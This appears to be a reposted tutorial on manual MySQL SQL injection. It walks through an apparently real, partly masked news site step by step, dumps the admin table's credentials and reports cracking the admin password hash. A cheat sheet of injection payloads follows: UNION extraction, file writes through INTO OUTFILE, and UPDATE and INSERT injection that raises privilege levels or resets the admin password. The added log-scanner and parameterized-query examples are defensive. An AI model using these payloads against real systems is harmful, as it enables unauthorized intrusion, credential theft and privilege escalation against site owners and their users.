SQL injection collection for MySQL

Source: Internet
Author: User
Tags: md5, mysql, version, sql injection

Recently, while studying manual SQL injection, I picked a website to practise on. The first task is to find a SQL injection point; a Google search for inurl:php?id= turns up candidates at random.

The link http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228 has a SQL injection point.

Step one: the injection test. The simplest method is to append and 1=1 and then and 1=2 to the link. If the page renders normally with and 1=1 but not with and 1=2, the link has an injection point. The principle is that the page's query is generally of the form

SELECT * FROM table WHERE id=1

and the test turns it into

SELECT * FROM table WHERE id=1 and 1=2

Step two: once the injection point is found, determine the number of columns in the current page's query:

http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 6
http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 7

ORDER BY 6 displays correctly and ORDER BY 7 does not, so the query has 6 columns.

Step three: find the display positions of the current link:

http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,4,5,6 --

The numbers that appear on the page mark the display positions; here they are 2 and 4.

Step four: extract basic database information.

http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,concat(user(),0x20,database(),0x20,version()),5,6--

User: People@localhost, database name: People, version: 5.0.20a-log

List all databases:

http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+table_schema),5,6+from+information_schema.columns--

Database names: information_schema,people,test

The INFORMATION_SCHEMA database was introduced in MySQL 5.0. It is a virtual database with no physical storage, similar to a "data dictionary": it exposes database metadata (database and table names, column types, access privileges and so on, down to a fine grain) as ordinary tables. It holds MySQL's basic database information, changes as the server changes, and is the main source consulted when inspecting the server or making system decisions.
On MySQL 5.0 and above we therefore query INFORMATION_SCHEMA to learn about the other databases. In the group_concat() function, the distinct keyword removes duplicate entries from the output.
Step five: list all the table names in the current database:

http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+table_name),5,6+from+information_schema.tables+where+table_schema=database()--

admin1,answer,check,class,news,system,zhaoping

Since the page is news.php, its data must come from the news table.
Step six: list the columns of admin1, then extract the user records and log in to the back end.
The hexadecimal form of admin1 is 0x61646d696e31.
List all the columns:

http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+column_name),5,6+from+information_schema.columns+where+table_name=0x61646d696e31--

Columns: id,admin,password,rank

Then extract the values of admin and password:

http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+id,0x2b,admin,0x2b,password,0x2b,rank),5,6+from+admin1--


The admin account's MD5 hash cracks to 123456, and that is all there is to it.
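As an added example (not part of the original post), the requests from the walkthrough above run through a small access-log scanner that flags the markers each step leaves in the query string; the log lines and client IPs are constructed in Apache combined format, and only the path from the post is reused.

```python
import re
from urllib.parse import unquote_plus

# Each rule is one marker the walkthrough's requests leave in the query string.
RULES = {
    "boolean probe":  re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "order by probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union select":   re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema read":    re.compile(r"\binformation_schema\.", re.I),
    "file access":    re.compile(r"\b(?:into\s+(?:out|dump)file|load_file\s*\()", re.I),
    "hex literal":    re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),
    "comment tail":   re.compile(r"(?:--|#|/\*)\s*$"),
}
REQ = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_query(line):
    """URL-decoded query string of a logged request ('+' and %xx), or '' if none."""
    m = REQ.search(line)
    if not m or "?" not in m.group(1):
        return ""
    return unquote_plus(m.group(1).split("?", 1)[1])


def scan(lines):
    """Return (line_no, decoded query, [rule names]) for every line matching a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        q = decode_query(line)
        names = [name for name, rx in RULES.items() if rx.search(q)]
        if names:
            hits.append((n, q, names))
    return hits


# Constructed Apache combined-format lines: two normal reads plus the post's step two,
# step three and step six requests (client IPs are made up).
LOG = """\
10.0.0.5 - - [01/Jan/2010:10:00:00 +0800] "GET /public/dongtai/news.php?id=228 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2010:10:00:01 +0800] "GET /public/dongtai/news.php?id=228+order+by+7 HTTP/1.1" 200 3010
10.0.0.9 - - [01/Jan/2010:10:00:02 +0800] "GET /public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,4,5,6+-- HTTP/1.1" 200 3044
10.0.0.9 - - [01/Jan/2010:10:00:03 +0800] "GET /public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat(distinct+column_name),5,6+from+information_schema.columns+where+table_name=0x61646d696e31-- HTTP/1.1" 200 3090
10.0.0.5 - - [01/Jan/2010:10:00:04 +0800] "GET /public/dongtai/news.php?id=229 HTTP/1.1" 200 5100
""".splitlines()

if __name__ == "__main__":
    for n, q, names in scan(LOG):
        print(f"line {n}: {', '.join(names)} :: {q}")
```

Decoding before matching matters: the same step-six request appears with %20, + and raw characters mixed, and a rule run on the raw line would miss it.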


Guessing queries on a table:
http://localhost/injection/user.php?username=angel' and LENGTH(password)='6
http://localhost/injection/user.php?username=angel' and left(password,1)='m

UNION statements:
http://localhost/injection/show.php?id=1' union select 1,username,password from user/*
http://localhost/injection/show.php?id=' union select 1,username,password from user/*

Writing to a file:
http://localhost/injection/user.php?username=angel' into outfile 'c:/file.txt
http://localhost/injection/user.php?username=' or 1=1 into outfile 'C:/file.txt
http://localhost/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Constructed homepage value: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

UPDATE statement:
First understand this SQL:
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
If the statement can be bent into any of the following forms, injection succeeds.

1: Set the homepage value to
http://4ngel.net', userlevel='3
The SQL statement then becomes
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
(userlevel is the user's privilege level)

2: Set the password value to
mypass)' WHERE username='admin'#
The SQL statement then becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#', homepage='$homepage' WHERE id='$id'

3: Set the id value to
' or username='admin'
The SQL statement then becomes
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' or username='admin'
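An added example (not the post's code) showing why both the news.php walkthrough above (steps two and three) and UPDATE case 1 here work against string-built SQL and stop working once every value is bound as a parameter; sqlite3 in memory stands in for MySQL so it runs offline, and the news and user tables are constructed to match the post.

```python
import sqlite3

def make_db():
    # Constructed tables: news with 6 columns (the post's ORDER BY 6 result) and a user
    # table with the columns the post's UPDATE touches. sqlite3 stands in for MySQL.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, "
               "author TEXT, posted TEXT, hits INTEGER)")
    db.execute("INSERT INTO news VALUES (228, 'Notice', 'Body', 'editor', '2010-01-01', 5)")
    db.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT, "
               "homepage TEXT, userlevel TEXT)")
    db.execute("INSERT INTO user VALUES (7, 'angel', 'old', '', '1')")
    return db

def news_concat(db, id_param):
    """news.php as the post describes it: the GET value is pasted into the SQL text."""
    return db.execute("SELECT * FROM news WHERE id=" + id_param).fetchall()

def news_bound(db, id_param):
    """Fixed: the value is bound as a parameter and is never parsed as SQL."""
    return db.execute("SELECT * FROM news WHERE id=?", (id_param,)).fetchall()

def update_concat(db, uid, password, homepage):
    """The post's UPDATE with $homepage interpolated (MySQL's MD5() left out for brevity)."""
    db.execute(f"UPDATE user SET password='{password}', homepage='{homepage}' WHERE id='{uid}'")
    return db.execute("SELECT homepage, userlevel FROM user WHERE id=?", (uid,)).fetchone()

def update_bound(db, uid, password, homepage):
    """Fixed: every value bound, so the quote inside $homepage stays part of the string."""
    db.execute("UPDATE user SET password=?, homepage=? WHERE id=?", (password, homepage, uid))
    return db.execute("SELECT homepage, userlevel FROM user WHERE id=?", (uid,)).fetchone()

def rows(query, id_param):
    """('rows', n) or ('error', message) for one news.php request against a fresh db."""
    try:
        return ("rows", len(query(make_db(), id_param)))
    except sqlite3.Error as e:
        return ("error", str(e))

ORDER_BY_7 = "228 order by 7"                     # step two, URL-decoded
UNION = "228 and 1=2 union select 1,2,3,4,5,6"    # step three, URL-decoded
HOMEPAGE = "http://4ngel.net', userlevel='3"      # UPDATE case 1 from the post

if __name__ == "__main__":
    for name, p in [("order by 7", ORDER_BY_7), ("union", UNION)]:
        print(f"{name:10s} concat={rows(news_concat, p)} bound={rows(news_bound, p)}")
    print("update concat:", update_concat(make_db(), 7, "mypass", HOMEPAGE))
    print("update bound: ", update_bound(make_db(), 7, "mypass", HOMEPAGE))
```

With concatenation the ORDER BY 7 probe raises the out-of-range error that leaks the column count and the UNION row comes back; with binding both requests simply match no row, and the bound UPDATE stores the whole payload in homepage while userlevel stays at 1.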


Common MySQL built-in functions:
database()
user()
system_user()
session_user()
current_user()
version()
substring()
mid()
char()
load_file()

In summary, injection is the simplest and most easily made mistake: for beginners it is usually just unfiltered input, while the advanced cases come down to server or logic problems.
